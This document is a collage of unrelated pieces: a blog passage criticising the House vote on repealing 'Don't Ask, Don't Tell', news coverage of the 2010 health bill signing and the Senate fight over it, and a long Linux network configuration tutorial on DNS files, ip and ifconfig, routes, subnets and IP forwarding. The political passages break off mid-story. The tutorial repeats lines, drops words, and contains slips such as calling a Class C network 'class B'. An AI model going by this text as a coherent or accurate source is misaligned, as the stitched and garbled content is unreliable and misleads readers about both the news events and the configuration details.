It could take several months for Congress to finish legislative action on repealing " Do n't Ask , Don't Tell . "
The full Senate has yet to vote on the defense authorization bill , and differences in the House and Senate versions would have to be hammered out in conference committee before the measure is sent to President Obama 's desk .
Still , Pelosi said , " we 're very proud " of the House vote to repeal " Do n't Ask , Don't Tell " in the House , calling it a " historic " action .
Never mind that gay servicmembers are continuing to be discharged or that the House version of " repeal " leaves the military brass in a position to kill DADTrepeal or that there are serious questions as to the one - sidedness of the Pentagon " study . "
A study that is n't even needed were the U.S. military to bother looking at how our military allies successfully repealed their bans on gays serving openly in those nations ' military .
John Aravosis sums up the situation well at America Blog :
Despite the president ’s signature , the legislative work on the bill is not over , nor is the partisan tussle over it .
Republicans on Tuesday renewed their vow to repeal the measure , albeit with a fresh slogan , “ repeal and replace , ” in a nod to the political difficulties of campaigning to overturn a measure that includes popular new benefits , like allowing young people to stay on their parents ’ plans until age 26 .
Attorneys general in more than a dozen states , most Republican , filed lawsuits contending that the measure is unconstitutional .
In the Capitol , the Senate opened what is expected to be a contentious debate on a measure that contains the final revisions to the health bill .
Democrats and Republicans are bracing for a fierce fight that is expected to last the balance of the week .
The Republicans have said they will try to block the measure , or at least use procedural weapons to punch as many holes in it as possible by striking out key provisions .
Democrats urged Republicans to stand down , given that the measure is already law .
“ Now it is a fact , ” declared Senator Max Baucus , Democrat of Montana .
“ Now it is law .
Now it is history .
Indeed , it ’s historic . ”
Image Republican lawmakers plan to put up roadblocks to the health reconciliation bill .
At a news conference on Tuesday , from left , were Senators Jon Kyl , Judd Gregg and Mitch McConnell .
Credit ... Luke Sharrett / The New York Times
Tuesday ’s signing ceremony was the beginning of what will be an intense sales pitch by the White House and leading Democrats to convince Americans of the benefits of the health bill .
As soon as it was over , Mr. Obama went into campaign mode , traveling to the Interior Department — the federal building with the biggest auditorium the White House could find — to address a crowd of more than 500 cheering doctors , nurses , patients and federal employees .
It was a remarkable turnabout from just two months ago , when many Democrats thought the bill was dead after Scott Brown , a Massachusetts Republican , won Mr. Kennedy ’s old Senate seat .
His victory deprived Mr. Obama of his 60 - vote supermajority and left Democrats deeply nervous .
At the White House on Tuesday , they seemed jubilant , even giddy .
They chanted “ Nancy ! Nancy !
Nancy ! ” as the House speaker , Nancy Pelosi , who had kept her skittish caucus together , entered the East Room .
They posed for pictures in front of the president ’s podium as they waited for Mr. Obama to arrive .
When he did , accompanied by Vice President Joseph R. Biden Jr. , the audience broke into his standard call - and - response campaign chant : “ Fired Up ! Ready to go ! ”
Linux TCP / IP Network Configuration Files :
File Description /etc/resolv.conf
List DNS servers for internet domain name resolution .
Manual page for : /etc/resolv.conf /etc/hosts
Lists hosts to be resolved locally ( not by DNS ) .
Manual page for : /etc/hosts /etc/nsswitch.conf
List order of host name search .
Typically look at local files , then NIS server , then DNS server .
Manual page for : /etc/nsswitch.conf
Red Hat / Fedora / CentOS : /etc/sysconfig/network Specify network configuration .
eg. Static IP , DHCP , NIS , etc. Red Hat / Fedora / CentOS : /etc/sysconfig/network-scripts/ifcfg-device
Specify TCP network information .
Ubuntu / Debian : /etc/network / interfaces
Specify network configuration and devices .
eg. Static IP and info , DHCP , etc .
Domain Resolution Configuration Files :
The following files configure the system so that host names can be resolved .
This is required when one will ssh to a host name eg.
venus.megacorp.com or point an email client to smtp.megacorp.com .
The system must be able to resolve the host names to IP addresses so that the network connection can be made .
File : /etc/resolv.conf - host name resolver configuration file to define server responsible for name resolution
search name - of - domain.com - Name of your domain or ISP 's domain if using their name server nameserver XXX.XXX.XXX.XXX - IP address of primary name server nameserver XXX.XXX.XXX.XXX - IP address of secondary name server
This configures Linux so that it knows which DNS server will be resolving domain names into IP addresses .
If using DHCP client , this will automatically be sent to you by the ISP and loaded into this file as part of the DHCP protocol .
If using a static IP address , ask the ISP or check another machine on your network .
Red Hat / Fedora GUI : /usr/sbin/system-config-network ( select tab " DNS " ) .
This configures Linux so that it knows which DNS server will be resolving domain names into IP addresses .
If using DHCP client , this will automatically be sent to you by the ISP and loaded into this file as part of the DHCP protocol .
If using a static IP address , ask the ISP or check another machine on your network .
Red Hat / Fedora GUI : ( select tab " DNS " ) .
File : /etc/hosts - locally resolve node names to IP addresses by explicit definition 127.0.0.1 your - node-name.your-domain.com localhost.localdomain localhost XXX.XXX.XXX.XXX
node - name
Note when adding hosts to this file , place the fully qualified name first .
( It helps sendmail identify your server correctly ) i.e. : XXX.XXX.XXX.XXX superserver.yolinux.com superserver
This informs Linux of local systems on the network which are not handled by the DNS server .
( or for all systems in your LAN if you are not using DNS or NIS )
The file format for the hosts file is specified by RFC 952 .
Red Hat / Fedora configuration GUI : /usr / sbin/system-config-network ( select tab " Hosts " ) .
Note when adding hosts to this file , place the fully qualified name first .
( It helps sendmail identify your server correctly ) i.e. :
This informs Linux of local systems on the network which are not handled by the DNS server .
( or for all systems in your if you are not using or ) File : /etc/nsswitch.conf - System Databases and Name Service Switch configuration file .
Define the cascading priority of name resolvers hosts : files dns nisplus nis
This example tells Linux to first resolve a host name by looking at the local hosts file ( / etc / hosts ) , then if the name is not found look to your DNS server as defined by /etc / resolv.conf and if not found there look to your NIS server .
In the past this file has had the following names : /etc/nsswitch.conf , /etc/svc.conf , /etc/netsvc.conf , ... depending on the distribution .
Note that device configuration information can be found in the autogenerated file /etc/udev/rules.d/70-persistent-net.rules
Fedora / Red Hat Network Configuration Files :
Files which hold the Linux system network configuration :
/etc/sysconfig/network
Red
Hat network configuration file used by the system during the boot process .
File : /etc/sysconfig/network-scripts/ifcfg-eth0
Configuration settings for your first ethernet port ( 0 ) .
Your second port is eth1 .
Configuration settings for your first ethernet port ( 0 ) .
Your second port is eth1 .
File : /etc/modprobe.conf ( kernel 2.6 ) /etc/modules.conf ( kernel 2.4 ) ( or for older systems : /etc/conf.modules )
Example statement for Intel ethernet card : alias eth0 eepro100
Modules for other devices on the system will also be listed .
This tells the kernel which device driver to use if configured as a loadable module .
( default for Red Hat )
Example statement for Intel ethernet card : Modules for other devices on the system will also be listed .
This tells the kernel which device driver to use if configured as a loadable module .
( default for Red Hat )
Fedora / Red Hat Network GUI Configuration
Tools :
The following GUI tools edit the system configuration files .
There is no difference in the configuration developed with the GUI tools and that developed by editing system configuration files directly .
Network configuration :
/usr/sbin/system-config-network ( FC - 2/3 ) GUI shown here --->
/usr/bin/redhat-config-network ( /usr/bin/neat ) ( RH 7.2+ FC - 1 )
( - 2/3 ) GUI shown here ---> ( /usr/bin/neat ) ( 7.2 + FC -1 ) Text console configuration tool :
/usr/sbin/system-config-network-tui
( Text User Interface ( TUI ) for Fedora Core 2/3 )
/usr/bin/redhat-config-network-tui ( RH 9.0 - FC - 1 )
( Text User Interface ( TUI ) for Fedora Core 2/3 ) ( RH 9.0 - FC - 1 )
Text console network configuration tool .
First interface only - eth0 : /usr/sbin/netconfig
First interface only - eth0 : /usr/bin/netcfg ( GUI ) ( last available with RH 7.1 )
Gnome Desktop Network Configuration
/usr/bin/gnome-network-preferences
( RH 9.0 - FC - 3 )
Proxy configuration .
Choose one of three options : Direct internet connection Manual proxy configuration ( specify proxy and port ) Automatic proxy configuration ( give URL )
( RH 9.0 - FC - 3 ) Proxy configuration .
Choose one of three options :
Assigning an IP address :
Computers may be assigned a static IP address or assigned one dynamically .
Typically a server will require a static IP while a workstation will use DHCP ( dynamic IP assignment ) .
The Linux server requires a static IP so that those who wish to use its resources can find the system consitently .
It is more easily found if the IP address does not change and is static .
This is not important for the Linux client workstation and thus it is easier to use an automated Dynamic Host Configuration Protocol ( DHCP ) for IP address assignment .
Static IP address assignment :
Choose one of the following methods :
Command Line :
There are two commands which can assign an IP address , ip ( current practice ) and ifconfig ( current and legacy ) .
ip command :
/ sbin / ip link # show list of network interfaces / sbin / ip addr add 192.168.10.12/255.255.255.0 broadcast 192.168.10.255 dev eth0 / sbin / ip addr show [ Potential Pitfall ] :
Avoid the following error by executing the command as root or use sudo : RTNETLINK answers : Operation not permitted ifconfig command :
/ sbin /ifconfig - a # show list of network interfaces even if down / sbin / ifconfig eth0 192.168.10.12 netmask 255.255.255.0 broadcast 192.168.10.255 /sbin / ifconfig # no arguments defaults to showing the current IP configuration [ Potential Pitfall ] :
Avoid the following error by executing the command as root or use sudo : SIOCSIFADDR : Operation not permitted SIOCSIFFLAGS : Operation not permitted SIOCSIFNETMASK : Operation not permitted SIOCSIFBRDADDR : Operation not permitted SIOCSIFFLAGS : Operation not permitted Network address by convention would be the lowest : 192.168.10.0
Broadcast address by convention would be the highest : 192.168.10.255
The gateway router can be anything , but following convention : 192.168.10.1
Note : the highest and lowest addresses are based on the netmask .
The previous example is based on a netmask of 255.255.255.0
Network address by convention would be the lowest : 192.168.10.0 Broadcast address by convention would be the highest : 192.168.10.255
The gateway router can be anything , but following convention : 192.168.10.1 Red Hat / Fedora GUI tools : /usr / bin/neat Gnome GUI network administration tool .
Handles all interfaces .
Configure for Static IP or DHCP client .
( First available with Red Hat 7.2 . )
/usr / bin/netcfg ( Handles all interfaces ) ( last available in Red Hat 7.1 )
Red Hat / Fedora Console tools : /usr/sbin/system-config-network-tui ( Text User Interface ) /usr / sbin / netconfig
( Only seems to work for the first network interface eth0 but not eth1 , ...)
Directly edit configuration files / scripts .
See format below .
Red Hat / Fedora / CentOS : /etc/sysconfig/network-scripts/ifcfg-eth0 for the first NIC , ifcfg - eth1 for the second , etc
for the first NIC , for the second , etc Ubuntu / Debian : /etc / network / interfaces as shown below .
The ip and ifconfig commands do NOT store this configuration permanently .
Upon reboot this information is lost .
Manually add the network configuration to the system configuration files to have them persist :
Any other commands you may want to add to the system boot sequence can be added to the end of the file /etc/rc.d/rc.local
The commands netcfg and netconfig make permanent changes to system network configuration files located in /etc / sysconfig / network - scripts / , so that this information is retained and used upon system boot .
The IANA has allocated IP addresses in the range of 192.168.0.0 to 192.168.255.255 for private networks .
[ Potential Pitfall ] :
You assign an IP address and the network connection still does not work ?
Your system settings may not be compatible with your router configuration
You still may need to add a route ( see Route configuration below )
Firewall rules may be blocking network traffic .
Test by flushing all firewall rules : iptables -F
Your system or your network may not be configured to use your upstream network
Helpful tools :
Network Calculators : Subnet mask calculator , node calculator , mask inverter , ...
IP subnet calculator
Command line IP Configuration : ip
ip [ OPTIONS ]
OBJECT COMMAND
or
ip OBJECT COMMAND
OPTIONS : - V[ersion ] | - h[ uman - readable ] | - s[tatistics ] | - r[ esolve ] | - f [ amily ] { inet | inet6 | ipx | dnet | link } | - o[ neline ] | - n[ etns ] name | - a[ ll ] | - c [ olor ]
OBJECT : link | addr( ess ) | addrlabel | route | rule | neigh | ntable | tunnel | tuntap | maddress | mroute | mrule | monitor | xfrm | netns | l2tp | tcp_metrics
COMMAND : add | delete | set | show | list | help
( Note : not all " OBJECT "s support all " COMMAND "s .
Use the command line help .
eg : ip addr help )
OBJECT Description address
addr
a protocol ( IP or IPv6 ) address on a device addrlabel
addrl Label configuration for protocol address selection l2tp tunnel ethernet over IP ( L2TPv3 ) link
l network device maddress multicast address monitor watch for netlink messages mroute multicast routing cache entry mrule rule in multicast routing policy database neighbour
neigh
n ARP or NDISC cache entry netns manage network namespaces ntable manage the neighbor cache 's operation route
r routing table entry rule rule in routing policy database tcp_metrics
tcpmetrics manage TCP Metrics tunnel tunnel over IP tuntap manage TUN / TAP devices xfrm manage IPSec policies
where : Options : Man page : ip
Assign a broadcast address : ip addr add broadcast 192.168.10.255 dev eth0
Delete the IP address assignment from a network interface : ip addr del 192.168.10.12/24 dev eth0
Assign an IP address using CIRD notation : ip addr add 192.168.10.12/24 broadcast 192.168.10.255 dev eth0
Turn off / shut down a network interface : ip link set dev eth1 down
Turn on a network interface : ip link set dev eth1 up
Examples :
Command line IP Configuration : ifconfig
ifconfig interface [ aftype ] options | address ...
interface : eth0 , eth1 , eth2 represent the computer ethernet interfaces
aftype : inet ( TCP / IP , default ) , inet6 ( IPv6 ) , ax25 ( AMPR Packet Radio ) , ddp ( Appletalk Phase 2 ) , ipx ( Novell IPX ) or netrom ( AMPR Packet radio )
Option Description up Activate the interface .
Implied if IP addresses are specified .
down
Shut down interface arp Enable ARP protocol on this interface .
Allow ARP to detect the addresses of computer hosts attached to the network .
- arp Disable ARP protocol on this interface promisc Enable promiscuous mode .
Receive all packets on the network not just those destined for this interface .
- promisc Disable promiscuous mode .
mtu ## Specify the Maximum Transfer Unit ( MTU ) of the interface .
The MTU is the maximum number of octets the interface is able to handle in a single transaction .
Defaults : Ethernet : 1500 SLIP : 296 broadcast XXX.XXX.XXX.XXX
Set the network broadcast address for this interface .
netmask XXX.XXX.XXX.XXX
Set the IP network mask for this interface .
where : Options : Man page : ifconfig
Ubuntu / Debian IP Configuration Files :
File : /etc/network/interfaces
auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 208.88.34.106 netmask 255.255.255.248 broadcast 208.88.34.111 network 208.88.34.104 gateway 208.88.34.110
Static IP example :
Dynamic IP ( DHCP ) example :
auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto eth1 iface eth1 inet dhcp auto eth2 iface eth2 inet dhcp auto ath0 iface ath0 inet dhcp auto wlan0 iface wlan0 inet dhcp
lo : Loopback interface ( network within your system without slowing down for the real ethernet based network )
eth0 : First ethernet interface card
wlan0 : First wireless network interface
Interfaces :
Also see " man interfaces "
/usr/bin/gnome-nettool ( apt - get install gnome - nettool )
/usr/bin/network-admin ( apt - get install gnome - network - admin )
Red Hat / Fedora / CentOS IP Configuration Files :
The Red Hat configuration tools store the configuration information in the file / etc / sysconfig / network .
They will also allow one to configure routing information .
File : /etc/sysconfig/network Static IP address Configuration : ( Configure gateway address ) NETWORKING=yes HOSTNAME = my - hostname - Hostname is defined here and by command hostname FORWARD_IPV4 =true - True for NAT firewall gateways and linux routers .
False for everyone else - desktops and servers .
GATEWAY = " XXX.XXX.XXX.YYY " - Used if your network is connected to another network or the internet .
Static IP configuration .
Gateway not defined here for DHCP client .
OR for DHCP client configuration : NETWORKING=yes HOSTNAME= my - hostname - Hostname is defined here and by command hostname ( Gateway is assigned by DHCP server . )
OR for NIS client configuration : NETWORKING=yes HOSTNAME= my - hostname - Hostname is defined here and by command hostname NISDOMAIN= NISProject1 - NIS domain to attach
OR for DHCP client configuration : ( Gateway is assigned by DHCP server . )
OR for NIS client configuration : File ( Red Hat / Fedora ) : /etc/sysconfig/network-scripts/ifcfg-eth0
( S.u.s.e. : /etc/sysconfig/network/ifcfg-eth-id- XX:XX:XX:XX:XX )
This file used by the command scripts ifup and ifdown Static IP address configuration : DEVICE=eth0 BOOTPROTO=static BROADCAST=XXX.XXX.XXX.255 IPADDR= XXX.XXX.XXX.XXX NETMASK=255.255.255.0 NETWORK= XXX.XXX.XXX.0 ONBOOT=yes -
Will activate upon system boot RHEL / Fedora additions : TYPE= Ethernet HWADDR= XX:XX:XX:XX:XX:XX GATEWAY= XXX.XXX.XXX.XXX OR for DHCP client configuration : DEVICE=eth0 ONBOOT=yes BOOTPROTO=dhcp RHEL / Fedora additions : IPV6INIT=no USERCTL=no PEERDNS=yes TYPE=Ethernet HWADDR= XX:XX:XX:XX:XX:XX
( S.u.s.e. : ) This file used by the command scripts and RHEL / Fedora additions : RHEL / Fedora additions :
/etc/sysconfig/network-scripts/ifup
BOOTPROTO=dhcp
BOOTPROTO=none
( Used by scriptto bring the various network interfaces on - line ) To disable DHCP changeto
In order for updated information in any of these files to take effect , one must issue the command : service network restart ( or : /etc/init.d / network restart )
Route :
The Linux OS manages outbound and inbound IP ( Internet Protocol ) traffic .
Inbound traffic is captured based on ARP and IP address configuration .
Outbound traffic is managed by routes .
Routing determines the path these packets take so that they are sent to their destinations .
This is required for all IP traffic , local and remote , including when multiple network interfaces are available .
Routes are held by the kernel routing table .
Direct routing table entries occur when the source and destination hosts are on the same physical network and packets are sent directly from the source to the destination .
Indirect routing table entries occur when the source and destination hosts are on different physical networks .
The destination host must be reached through one or more IP gateways .
The first gateway is the only one which is known by the host system .
Default routing defines a gateway to use when the direct network route and the indirect host routes are not defined for a given IP address .
route
Red Hat / Fedora : /etc/sysconfig/network-scripts/route-eth0
Red Hat 7 : /etc/sysconfig/static-routes
S.u.s.e. 9.2 : /etc/sysconfig/network/routes
10.2.3.0/16 via 192.168.10.254
/etc/sysconfig/network-scripts/ifup-routes
eth0
IP uses a routing table to determine where packets should be sent .
First the packet is examined to see if its ' destination is for the local or remote network .
If it is to be sent to a remote network , the routing table is consulted to determine the path .
If there is no information in the routing table then the packet is sent to the default gateway .
Static routes are set with thecommand and with the configuration file :
See command :
Dynamic routes : RIP ( Routing Information Protocol ) is used to define dynamic routes .
If multiple routes are possible , RIP will choose the shortest route .
( Fewest hops between routers not physical distance . )
Routers use RIP to broadcast the routing table over UDP port 520 .
The routers would then add new or improved routes to their routing tables .
Man pages :
route - show / manipulate the IP routing table ( Static route ) Show routes : Option Description -n display IP addresses .
Do not resolve host names for faster results .
-e
Print more extensive information about routes .
-v Verbose .
-- help Route command information .
Manipulate routes : Option Description add or del or neither Add or delete route information .
If not specified then print route table information .
- host XXX.XXX.XXX.XXX
Add a single computer host identified by the IP address .
- net XXX.XXX.XXX.XXX
Add a network identified by the network address , to the route .
gw XXX.XXX.XXX.XXX
Specify the network gateway .
netmask XXX.XXX.XXX.XXX
Specify the network netmask .
default
Of all the routes specified , identify one as the default network route .
( typically the gateway is specified as the default route ) Examples :
Show routing table : route -e Access individual computer host specified via network interface card eth1 :
route add - host 123.213.221.231 eth1
Access ISP network identified by the network address and netmask using network interface card eth0 :
route add - net 10.13.21.0 netmask 255.255.255.0 gw 192.168.10.254 eth0
Conversely : route del - net 10.13.21.0 netmask 255.255.255.0 gw 192.168.10.254 eth0
Specify default gateway to use to access remote network via network interface card eth0 :
route add default gw 201.51.31.1 eth0
( Gateway can also be defined in /etc/ sysconfig / network )
Specify two gateways for two network destinations : ( i.e. one external , one internal private network .
Two routers / gateways will be specified . )
Add internet gateway as before : route add default gw 201.51.31.1 eth0
Add second private network : route add - net 10.0.0.0 netmask 255.0.0.0 gw 192.168.10.254 eth0
Manipulate routes : Examples : ip - show / manipulate routing , devices , policy routing and tunnels
Examples :
Show routing table : ip route
Add a new route : ip route add 192.168.10.0/24 via 192.168.10.1
( where the network address is 192.168.10.0 , the netmask is " / 24 " or 255.255.255.0 and the router has the IP address 192.168.10.1 )
Specify default gateway to use to access remote network via network interface card eth0 : ip route add default 192.168.10.0/24 via 192.168.10.1
Delete a route : ip route del 192.168.1.0/24 dev eth0
Delete a default route : ip route del default
Examples : fuser - identify processes using files or sockets
Show which processes are using a particular file / directory : fuser file - name
This command will list the process ID and a descriptor indicating the following : c : Durrent directory e : Executable f : a file open for reading F : a file open for writing r : Roo directory m : Memory Mapped File / Directory
List processes using a specified TCP / UDP socket : fuser - v -n tcp 8080
Kill a process using a specified TCP / UDP socket : fuser - i -k 8080 / tcp
Any signal can be sent to the process , not just " KILL " .
( fuser - l ) : HUP QUIT TRAP ABRT IOT STOP etc
Show which processes are using a particular file / directory :
This command will list the process ID and a descriptor indicating the following :
List processes using a specified TCP / UDP socket : Kill a process using a specified TCP / UDP socket :
Any signal can be sent to the process , not just " KILL " . ( ) :
Routers and Routing :
Routing software can be run on Linux so that it will act as a router .
Older packages such as routed and gated are no longer supported .
Quagga , a fork of GNU " Zebra " , has replaced them .
Quagga is a routing software suite , providing implementations of OSPFv2 , OSPFv3 , RIP v1 and v2 , RIPng and BGP - 4 for Linux platforms .
Installation : RH / CentOS : yum install quagga
zebra - a routing manager for use with associated Quagga components
bgpd - a BGPv4 , BGPv4 + , BGPv4 - routing engine for use with Quagga routing software
isisd - an IS - IS routing engine for use with Quagga routing software
ospfd - an OSPF v2 routing engine for use with Quagga routing software
ospf6d - an OSPFv3 routing engine for use with Quagga routing software
ripd - a RIP routing engine for use with Quagga routing software
ripngd - a RIPNG routing engine for use with Quagga routing software
vtysh - a integrated shell for Quagga routing software
Network IP aliasing :
Assign more than one IP address to one ethernet card :
ifconfig eth0 XXX.XXX.XXX.XXX netmask 255.255.255.0 broadcast XXX.XXX.XXX.255 ifconfig eth0:0 192.168.10.12 netmask 255.255.255.0 broadcast 192.168.10.255 ifconfig eth0:1 192.168.10.14 netmask 255.255.255.0 broadcast 192.168.10.255 route add - host XXX.XXX.XXX.XXX dev eth0 route add - host 192.168.10.12 dev eth0 route add - host 192.168.10.14 dev eth0
eth0 Link encap : Ethernet HWaddr 00:10:4C:25:7A:3 F inet addr:XXX.XXX.XXX.XXX Bcast : XXX.XXX.XXX.255 Mask :255.255.255.0 UP
BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets : 14218 errors:0 dropped:0 overruns : 0 frame:0 TX packets : 1362 errors:0 dropped:0 overruns : 0 carrier : 0 collisions : 1 txqueuelen : 100 Interrupt: 5 Base address : 0xe400 eth0:0 Link encap : Ethernet HWaddr 00:10:4C:25:7A:3 F inet addr:192.168.10.12 Bcast : 192.168.10.255 Mask :255.255.255.0 UP
BROADCAST RUNNING MULTICAST MTU:1500 Metric: 1 Interrupt:5 Base address :0xe400 eth0:1 Link encap : Ethernet HWaddr 00:10:4C:25:7A:3 F inet addr:192.168.10.14 Bcast : 192.168.10.255 Mask :255.255.255.0 UP
BROADCAST RUNNING MULTICAST MTU:1500 Metric: 1 Interrupt:5 Base address:0xe400
In this example 0 and 1 are aliases in addition to the regular eth0 .
The result of the ifconfig command :
Config file : /etc/sysconfig/network-scripts/ifcfg-eth0:0
DEVICE=eth0:0 ONBOOT=yes BOOTPROTO=static BROADCAST=192.168.10.255 IPADDR=192.168.10.12 NETMASK=255.255.255.0 NETWORK=192.168.10.0 ONBOOT=yes
Aliases can also be shut down independently .
i.e. : ifdown eth0:0
The option during kernel compile is : CONFIG_IP_ALIAS=y ( Enabled by default in Redhat )
Note : The Apache web server can be configured so that different IP addresses can be assigned to specific domains being hosted .
See Apache configuration and " configuring an IP based virtual host " in the YoLinux Web site configuration tutorial .
DHCP Linux Client : get connection info : / sbin / pump - i eth0 -- status
( Red Hat Linux 7.1 and older )
Device eth0 IP : 4.XXX.XXX.XXX Netmask : 255.255.252.0 Broadcast : 4.XXX.XXX.255 Network : 4.XXX.XXX.0 server 131.XXX.XXX.4 Next server 0.0.0.0 Gateway : 4.XXX.XXX.1 Domain : vz.dsl.genuity.net Nameservers : 4.XXX.XXX.1 4.XXX.XXX.2 4.XXX.XXX.3
Renewal time : Sat Aug 11 08:28:55 2001 Expiration time : Sat Aug 11 11:28:55 2001
Changing the host name :
This is a three step process :
Issue the command : hostname new - host - name Change network configuration file : /etc/sysconfig / network
Edit entry : HOSTNAME =new - host - name Restart systems which relied on the hostname ( or reboot ) : Restart network services : service network restart
( or : /etc/init.d / network restart )
( or : ) Restart desktop : Bring down system to console mode : init 3 Bring up X - Windows : init 5
/etc/hosts
One may also want to check the filefor an entry using the system name which allows the system to be self aware .
The hostname may be changed at runtime using the command : sysctl - w kernel.hostname=" superserver "
Note that hostnames may only contain alphanumeric characters , minus signs ( " - " ) , and periods ( " . " ) .
They must begin with an alphabetic character and end with an alphanumeric character .
Change the host name using GUI tool : /usr/sbin/system-config-network
( Red Hat / Fedora / CentOS )
Hostname entries are made in two places :
Select the " DNS " tab .
Select the " DNS " tab .
Select the " Devices " tab + " Edit " + the " General " tab .
Select the " Devices " tab + " Edit " + the " General " tab .
Activating and De-Activating your NIC :
Activate : / sbin / ifup eth0
( Also : ifconfig eth0 up - Note : Even if no IP address is assigned you can listen . )
( Also : ) De-Activate : / sbin / ifdown eth0
( Also : ifconfig eth0 down )
/etc/sysconfig/network-scripts/
Commands for starting and stopping TCP / IP network services on a Network Interface Card ( NIC ) : These scripts use the scripts and NIC configfiles in
GUI Interface control / configuration :
Start / Stop network interfaces
/usr/bin/system-control-network ( Fedora Core 2/3 )
/usr/bin/redhat-control-network
( RH 9.0 - FC - 1 )
( Fedora Core 2/3 ) ( RH 9.0 - FC - 1 ) Configure Ethernet , ISDN , modem , token Ring , Wireless or DSL network connection :
/usr/sbin/system-config-network-druid ( FC2/3 )
/usr/sbin/redhat-config-network-druid ( RH 9 - FC - 1 )
Subnets :
Subnetting is a methodology used to divide a network into multiple logical networks ( subnets ) .
Subnets are often defined for geographical or location reasons .
Subnet masks are defined to reflect the number of computer systems and the IP addresses of the systems on the subnet .
M
A
S
K # OF
SUB
NETS Slash
Fmt CLASS A
HOSTS CLASS A
MASK CLASS B
HOSTS CLASS B
MASK CLASS C
HOSTS CLASS C
MASK CLASS C SUB
HOSTS CLASS C SUB
MASK 255 1
or
256 /32 16,777,214 255.0.0.0 65,534 255.255.0.0 254 255.255.255.0 Invalid
1 address 255.255.255.255 254 128 /31 33,554,430 254.0.0.0 131,070 255.254.0.0 510 255.255.254.0 Invalid
2 addresses 255.255.255.254 252 64 /30 67,108,862 252.0.0.0 262,142 255.252.0.0 1,022 255.255.252.0 2 hosts
4 addresses 255.255.255.252 248 32 /29 134,217,726 248.0.0.0 524,286 255.248.0.0 2,046 255.255.248.0 6 hosts
8 addresses 255.255.255.248 240 16 /28 268,435,454 240.0.0.0 1,048,574 255.240.0.0 4,094 255.255.240.0 14 hosts
16 addresses 255.255.255.240 224 8 /27 536,870,910 224.0.0.0 2,097,150 255.224.0.0 8,190 255.255.224.0 30 hosts
32 addresses 255.255.255.224 192 4 /26 1,073,741,822 192.0.0.0 4,194,302 255.192.0.0 16,382 255.255.192.0 62 hosts
64 addresses 255.255.255.192 128 2 /25 2,147,483,646 128.0.0.0 8,388,606 255.128.0.0 32,766 255.255.128.0 126 hosts
128 addresses 255.255.255.128
Binary position 8 7 6 5 4 3 2 1 Value 128 64 32 16 8 4 2 1 Example : 192 1 1 0 0 0 0 0 0
Example 192=128+64
Some addresses are reserved and outside this scope .
Loopback ( 127.0.0.1 ) , reserved class C 192.168.XXX.XXX , reserved class B 172.31.XXX.XXX and reserved class A 10.XXX.XXX.XXX .
Subnet Example :
208.88.34.104 Network
Base address
208.88.34.105 Computer 1
208.88.34.106 Computer 2
208.88.34.107 Computer 3
208.88.34.108 Computer 4
208.88.34.109 Computer 5
208.88.34.110 DSL router / Gateway
208.88.34.111
Broadcast address
Your ISP assigns you a subnet mask of 255.255.255.248 for your office .
Of the eight addresses , there are six assigned to hardware systems and ultimately only five usable addresses .
Links :
Network Classes :
The concept of network classes is a little obsolete as subnets are now used to define smaller networks using CIDR ( Classless Inter - Domain Routing ) as detailed above .
These subnets may be part of a class A , B , C , etc network .
For historical reference the network classes are defined as follows :
Class A : Defined by the first 8 bits with a range of 0 - 127 .
First number ( 8 bits ) is defined by Internic i.e. 77.XXX.XXX.XXX
One class A network can define 16,777,214 hosts .
Range : 0.0.0.0 - 127.255.255.255
Defined by the first 8 bits with a range of 0 - 127 .
First number ( 8 bits ) is defined by Internic i.e. 77.XXX.XXX.XXX
One class A network can define 16,777,214 hosts .
Range : 0.0.0.0 - 127.255.255.255 Class B : Defined by the first 8 bits with a range from 128 - 191
First two numbers ( 16 bits ) are defined by Internic i.e. 182.56.XXX.XXX
One class B network can define 65,534 hosts .
Range : 128.0.0.0 - 191.255.255.255
Defined by the first 8 bits with a range from 128 - 191 First two numbers ( 16 bits ) are defined by Internic i.e. 182.56.XXX.XXX
One class B network can define 65,534 hosts .
Range : 128.0.0.0 - 191.255.255.255 Class C : Defined by the first 8 bits with a range from 192 - 223
First three numbers ( 24 bits ) are defined by Internic i.e. 220.56.222.XXX
One class B network can define 254 hosts .
Range : 192.0.0.0 - 223.255.255.255
Defined by the first 8 bits with a range from 192 - 223 First three numbers ( 24 bits ) are defined by Internic i.e. 220.56.222.XXX
One class B network can define 254 hosts .
Range : 192.0.0.0 - 223.255.255.255
Class D : Defined by the first 8 bits with a range from 224 - 239
This is reserved for multicast networks ( RFC988 )
Range : 224.0.0.0 - 239.255.255.255
Defined by the first 8 bits with a range from 224 - 239
This is reserved for multicast networks ( RFC988 ) Range : 224.0.0.0 - 239.255.255.255
Class E : Defined by the first 8 bits with a range from 240 - 255
This is reserved for experimental use .
Range : 240.0.0.0 - 247.255.255.255
Enable Forwarding :
eth0
eth1
Forwarding allows the network packets on one network interface ( i.e. ) to be forwarded to another network interface ( i.e. ) .
This will allow the Linux computer to connect ( " ethernet bridge " ) or route network traffic .
The bridge configuration will merge two ( or several ) networks into one single network topology .
IpTables firewall rules can be used to filter traffic .
A router configuration can support multicast and basic IP routing using the " route " command .
IP masquerading ( NAT ) can be used to connect private local area networks ( LAN ) to the internet or load balance servers .
Turn on IP forwarding to allow Linux computer to act as a gateway or router .
echo 1 > / proc/sys/net/ipv4/ip_forward
Default is 0 .
One can add firewall rules by using iptables ( or ipchains ) .
Another method is to alter the Linux kernel config file : /etc/sysctl.conf
Set the following value : net.ipv4.ip_forward = 1
See file / etc / sysconfig / network for storing this configuration .
FORWARD_IPV4=true
Change the default " false " to " true " .
All methods will result in a proc file value of " 1 " .
Test : cat / proc/sys/net/ipv4/ip_forward
The TCP Man page - Linux Programmer 's Manual and /usr / src/linux / Documentation / proc.txt ( Kernel 2.2 RH 7.0 - ) cover / proc / sys / net / ipv4 /* file descriptions .
Also see : ( YoLinux tutorials )
Adding a network interface card ( NIC ) :
Manual method :
This does not alter the permanent configuration and will only configure support until the next reboot .
cd /lib/ modules/2.2.5-15/net/ -
Use kernel version for your system .
This example uses 2.2.5-15
( Fedora Core 3 : /lib/modules/2.6.12-1.1381_FC3/kernel/net / )
Here you will find the modules supported by your system .
It can be permanently added to : /etc/modprobe.conf ( kernel 2.6 ) /etc/modules.conf ( kernel 2.4 ) ( or for older systems : /etc/conf.modules )
Example : alias eth0 3c59x
( Fedora Core 3 : ) Here you will find the modules supported by your system .
It can be permanently added to : Example : / sbin / insmod 3c59 x ( For a 3Com ethernet card )
This inserts the specified module into the kernel .
